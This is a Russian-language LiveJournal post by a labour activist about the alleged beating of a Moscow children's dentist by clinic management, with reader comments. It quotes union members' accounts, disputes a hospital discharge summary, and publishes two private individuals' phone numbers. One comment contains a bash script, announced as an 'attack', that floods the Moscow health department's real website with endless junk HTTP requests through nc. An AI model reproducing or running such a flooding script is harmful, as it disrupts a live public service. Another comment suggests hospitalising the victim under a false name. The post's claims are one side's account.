andrey_konoval


Андрей Коновал

Солидарность и коллективные действия


Previous Entry Поделиться Next Entry
"Физически нейтрализован": развитие ситуации вокруг избиения врача
andrey_konoval
Кампанию по "отмазыванию" руководства 26-й детской стоматологической поликлиники, избившего и ограбившего врача Ивана Степанова, похоже, координируют из департамента здравоохранения Москвы.

Об этом говорит развитие событий в 67-й больнице, где Ивана госпитализировали через скорую помощь, а также комментарий пресс-службы департамента о том,  что якобы хирург-стоматолог отказался писать объяснительную и избил главврача, а не наоборот.

Вот что написала председатель Московского горкома МПРЗ "Действие" Анна Землянухина, вместе с другими участницами "итальянской забастовки" навестившая Ивана в больнице после работы. Ее рассказ построен на воспоминаниях Ивана, а также того, чему она была сама свидетелем в больнице.

"После отказа доктора подписать акт фиктивной проверки рабочего места, представители администрации начали угрожать Ивану Сергеевичу, грубо выражаться. В ответ доктор достал телефон и стал снимать происходящее на камеру телефона. После чего мужчины схватили его, повалили на пол, в результате чего Иван Сергеевич ударился головой о кафель, посыпались удары, а главный врач вырывала у него телефон. После чего Иван Сергеевич потерял сознание. На руках и шее врача имеются множественные следы женских ногтей. На шум, доносящийся из кабинета, сбежались коллеги и пациенты, пытались открыть дверь, дверь держали изнутри. В какой-то момент Иван пришел в себя и ему чудом удалось вырваться из кабинета. Он начал звать на помощь и просить вызвать полицию. Также была вызвана скорая медицинская помощь. Иван был госпитализирован в ГКБ 67 с сотрясением мозга. В больнице ему сделали КТ головы и рентген грудной клетки. До нашего приезда доктора никто не осматривал в отделении. Сразу же после нашего приезда его коллегиально осмотрели зам глав врача, заведующий отделением и доктор-травматолог. (Как проходил этот "осмотр" - описала Екатерина Чацкая, см. ниже. - Андрей Коновал). В результате чего диагноз сотрясение головного мозга был снят (несмотря на то, что Иван терял сознание и его рвало), поставлен диагноз ушибы и ссадины мягких тканей, а через 5 минут уже была готова выписка. И тут же в прессе появилась информация от пресс-службы ДЗМ о том, что врач-стоматолог напал на главврача, он выписан из больницы с ушибами, а главврач госпитализирована с сотрясением головного мозга. Пока мы находились в стационаре к Ивану приходил некто, представившийся сотрудником правоохранительных органов, который сказал, что главврач написала на Ивана заявление в милицию, что он хочет нам помочь, и жене Ивана скоро позвонят "некие благодетели", которые "помогут уладить всё мирно". Потом нас силком выпроводили из больницы, вместе с Иваном. По имеющейся у нас информации, карта вызова скорой помощи была сразу же взята на проверку в ДЗМ, а выписка сфабрикована (переписана)".
Друзья, что же это происходит? Администрация поликлиники может позволить себе совершить любые противоправные действия против подчиненных, унижать, незаконно обыскивать, избивать, красть телефоны, а ДЗМ покрывать их, выступая соучастником преступления? Коллеги, может хватит позволять администрации топтать нашу честь, издеваться над нами?".


А вот что написала у себя на странице в ВК Екатерина Чацкая, сопредседатель МПРЗ "Действие":

Когда я приехала в больницу никакого осмотра врача не было. Проведено исследование: КТ, Рентген грудной клетки и живота. Но осмотра врача не было!
Уже при мне пришел врач. Представился травматологом. Провел "осмотр", даже не раздев пациента. Спустя 5 минут пришли 3 врача, и сообщили, что выписывают Ивана из больницы. Причем, если до этого речь шла о сотрясении мозга (была тошнота и рвота, кратковременная потеря сознания), то в выписке, которую тут же выдали, зафиксированы только ушибы и ссадины.
Выписка не выдерживает никакой критики! Во-первых, написано, что пациент "вел себя неадекватно и агрессивно". Это домыслы врачей, внесенные в документ. Во-вторых, в выписке указано, что был произведен осмотр хирурга и нейрохирурга, травматолога. . В-третьих, в выписки вписаны анализы, которые взяли прямо перед тем, как вручить выписку. Крутая лаборатория... Анализы готовы и вписаны менее, чем за минуту!
Больничный лист не предложили, и не написали об этом в выписке...
После всего этого нас всех выгнали из отделения вместе с Иваном, несмотря на продолжающееся у него головокружение".


А вот и сама выписка из больницы.
Обратите внимание на слова: "При дополнительном сборе информации установлено, что 24.06.15 в детской стоматологической поликлинике в присутствии членов линейной комиссии стал вести себя неадекватно и агрессивно, пришлось применять меры физической нейтализации. На место происщшествия вызваны наряд полиции и бригада скорой помощи".
Во-первых, п
олицию вызвал папа пациента, и вызывал он ее не для "нетрализации" Ивана, а как раз с тем, чтобы оградить его от нападения, поскольку за дверью послышались звуки борьбы, а  дверь кто-то держал изнутри. Не мог же Иван Степанов одновременно нападать на 5 человек администрации и одновременно держать дверь. А скорую вызвал себе сам Иван.
Во-вторых, каким образом  и с какой стати был проведен "дополнительный сбор информации"? И с какой стати она фигурирует, в выписке как достоверная, причем без ссылки на источник? И причем тут вообще анамнез?

выписка обр.jpg

Кроме того, мучает вопрос, а что с  телефоном? Главврач по рассказу Ивана и свидетеля, вырвала его, когда его повалили на пол. Где он? То, что телефон был и на него велась видеозапись, подтверждает даже пресс-служба ДЗМ, рассказывающая версию администрации: «После предъявления распоряжения Степанов начал вести себя агрессивно, угрожал, включил видеозапись."

Грабеж, ст.161 УК РФ.


Очевидно, что то, что сотворила команда из главврача и двух ее замов, - это уголовка. И единственнй их шанс - это обвинить как раз потерпевшего. И тут они будут работать по полной.

В общем, парня надо защищать. Телефон Ивана Степанова (который ему привезли участницы "итальянской забастовки" вместо похищенного) - 89265503884. Телефон Екатерины Чацкой, сопредседатель МПРЗ "Действие"  (Москва) - 89268983115

Предыстория:http://andrey-konoval.livejournal.com/334509.html
Видео - разговор с женой Ивана Степанова.
https://www.youtube.com/watch?v=iUNVw-8tBhA
https://www.youtube.com/watch?v=HumRU9ZxgfE

  • 1
Какие новости? Это у нас в районе произошло((
Никто не пишет. Утро или все боятся?

Спасибо, это всё читала.
Что сегодня происходит? Мож звонил уже кто?

Надо эту выписку " заслать " в страховую компанию. Ну не все же сволочи и ангажированные. Кто Главный травматолог или Главный невролог Москвы. Ему заяву и копию выписки и ТРЕБОВАНИЕ помочь.
Если у Ивана и сейчас головокружения, рвота, то СНОВА вызывайте неотложную помощь с СНОВА ГОСПИТАЛИЗИРУЙТЕ.
А не слабо госпитализировать ПОД ЧУЖОЙ фамилией ????? Ну хотя бы на ПЕРВОЕ ВРЕМЯ пока не станет вопрос об оформлении больничного или пока не потребуют страховой полис ?
Тогда они его не вдруг то найдут...
Но.... если нет больничного, то вообще-то на радоту надо идти.
Что делать то ?

Сейчас - лечиться, а далее, как вариант, обратиться на тв или к известным адвокатам.

Там в выписках написало " линейная комиссия ". Как сделать так чтобы подтвердить ПОЛНОМОЧИЯ этой комиссии ? Как истребовать документ кем и на каком основании была создана эта комиссия. Наверное, приказ должен быть руководителя учреждения ?

Выложите, пожалуйста, всю выписку, может я что-то еще нарою. Вообще стыд и стам что в СТОЛИЦЕ такие выписки безграмотные пишут .

К частникам надо попытаться обратиться. И не в Москву, а в Подмосковье. Что бы они зафиксировали сотряс (По КТ сотряс не ставится, если что). Тогда можно будет попытаться уличить 67 ГКБ в подлоге.

Сделать бы независимую экспертизу, пока есть симптомы.
Но, там департамент прёт против него((

Негосударственная травма с действующей лицензией.
Фото и кинофиксация
заявление в милицию.
адвокат
максимальная публичность.
А вот кавказцы они или малайцы мне без разницы

Иван Степанов

Обратится в администрацию президента и в общероссийский народный фронт пробывали?

#!/bin/bash

echo "Я считаю, что избеение Ивана"
echo "Степанова не допустимо!"

echo "Атака запущина"

while true
do
echo -en "GET /kto-izbil-ivana-stepanova$(cat /dev/urandom|head -c 64) HTTP/1.0\r\n Host: www.mosgorzdrav.ru\r\n" | pv -L 10 | nc www.mosgorzdrav.ru -q -1 80
done

Благодаря Единой России, даже если сменят главврача, врача -правдоруба никуда врачом на работу не примут.Это не гласный закон всех руководителей.И такой негласный закон только в России .Насчет администрации Президента, не ращбираясь скинут в низ, там это никому не интересно, предателей системы нигде в России не любят.Все прогнило...

Edited at 2016-08-02 23:59 (UTC)

  • 1
?

Log in

No account? Create an account